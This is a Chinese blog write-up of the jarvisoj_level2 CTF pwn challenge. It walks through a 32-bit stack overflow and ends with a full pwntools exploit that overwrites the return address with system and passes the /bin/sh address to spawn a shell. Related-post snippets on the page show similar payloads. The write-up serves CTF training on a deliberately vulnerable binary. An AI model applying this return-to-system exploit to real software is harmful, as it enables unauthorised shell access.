jarvisoj_level2

最新推荐文章于 2024-05-09 22:28:34 发布
最新推荐文章于 2024-05-09 22:28:34 发布
阅读量879 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn python 网络安全 CTF WriteUP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123612181
版权

jarvisoj_level2

使用checksec查看:
在这里插入图片描述
放进IDA中分析:
在这里插入图片描述

  • 存在漏洞函数vulnerable_function(),跟进。

vulnerable_function()
在这里插入图片描述

  • return read(0, &buf, 0x100u);:向变量buf中写入0x100长度的数据,变量buf距离ebp 0x88,存在栈溢出。
  • system("echo Input:");:有system()函数可以使用

查询该程序中的字符串:
在这里插入图片描述

  • 发现有/bin/sh

题目思路

  • 利用栈溢出跳转system@PLT
  • system参数给上/bin/sh
  • getshell

步骤解析

无需

完整exp

from pwn import * 

#start
r = process("../buu/jarvisoj_level2")
elf = ELF("../buu/jarvisoj_level2")

#params
sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

#attack
payload = b'M' * (0x88 + 4) + p32(sys_addr) + b'M' * 4 + p32(bin_sh_addr)
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CALIPSO_READERS_L2_Level2_5km_calipso_
10-02
标题“CALIPSO_READERS_L2_Level2_5km_calipso_”指的是NASA的CALIPSO(Cloud-Aerosol Lidar and Infrared Pathfinder Satellite Observation)卫星数据的第二级(Level 2)5公里分辨率的读取器。描述中提到的“nasa...
Low_Level_IO
02-11
2020年计算机体系结构和汇编语言组合项目阅读Proj6_Morrowj2.asm以获得代码该程序获取10个带符号的32位整数,进行验证并将其从ASCII转换为SDWORD,然后在转换回ASCII以及求和和舍入平均后,显示SDWORDS数组。
[CTF]jarvisoj_level2
凉水的博客
01-12 495
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_level2[BUUCTF]
最新发布
moonlightsunshin的博客
05-09 166
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
jarvisoj_level2题解
OrientalGlass的博客
01-08 220
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 593
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
2. 定义速度场:根据特定的图像特征(如梯度、色彩、纹理等)和能量函数,计算φ函数应该移动的速度。 3. 求解Level Set方程:使用有限差分或者数值积分的方法,更新φ函数的值,模拟其随时间的演化。 4. 重构边界:...
3D_LevelSet 2_levelset_forwardweh_3Dlevelset_
10-02
《3D LevelSet方法在3D医学图像分割中的简单实现》 在计算机视觉与医学成像领域,3D LevelSet方法是一种广泛应用于图像分割的重要技术。该方法通过数学上的水平集理论,对复杂的三维图像进行精确分割,尤其适用于...
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 751
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
BUUCTF jarvisoj_level2
leesinalps的博客
12-01 106
可以看出利用的是格式化字符串的漏洞,需要我们修改var地址往下数第十四个,类似是数组的结构到var[13]为17,并且为LL就是long long int八个字节,,相当于64位的数据'\x11\x00\x00\x00\x00\x00\x00\x00'。如果用户输入的数据超出了数组的大小,就会覆盖内存中的其他数据,这可能导致不可预测的错误或者潜在的攻击。总之,这段代码的主要问题在于它没有进行充分的输入验证和保护,因此容易受到输入数据的恶意滥用,可能会导致安全漏洞。:这一行定义了一个名为。
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 773
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
jarvis oj---level2x64
weixin_45427676的博客
09-29 301
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 356
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
jarvisoj misc
weixin_46578840的博客
09-23 1504
上帝之音

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值